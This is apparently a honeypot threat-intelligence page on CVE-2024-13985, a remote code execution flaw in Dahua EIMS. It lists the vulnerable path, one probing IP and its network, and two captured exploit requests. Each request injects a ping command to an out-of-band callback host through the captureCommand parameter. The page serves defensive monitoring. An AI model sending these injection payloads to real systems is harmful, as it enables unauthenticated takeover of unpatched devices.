CVE-2024-13985: Dahua EIMS - Unauthenticated Remote Code Execution via capture_handle

HoneyLabs honeypots recorded 2 probes matching CVE-2024-13985 from 1 distinct source IP addresses in the last 7 days. Severity is rated critical.

Request paths that identify it

  • /config/asst/system_setPassWordValidate.action/capture_handle.action

Addresses probing it

Source IPProbesNetworkCountry
93.123.109.2142Techoff Srv LimitedBulgaria

Networks it comes from

ASNOrganisationProbesSource IPs
AS48090Techoff Srv Limited21

Captured requests

  • /config/asst/system_setPassWordValidate.action/capture_handle.action?captureFlag=true&captureCommand=ping%20dat5s2dr4bohuvf6jbkgxczgsci94ojxn.oast.online%20index.pcap
  • /config/asst/system_setPassWordValidate.action/capture_handle.action?captureFlag=true&captureCommand=ping%20daucadtr4bot53oq70f05hfd1jof4gqqp.oast.pro%20index.pcap

CVE report

CVE report

Open a specific CVE from the CVE tracker.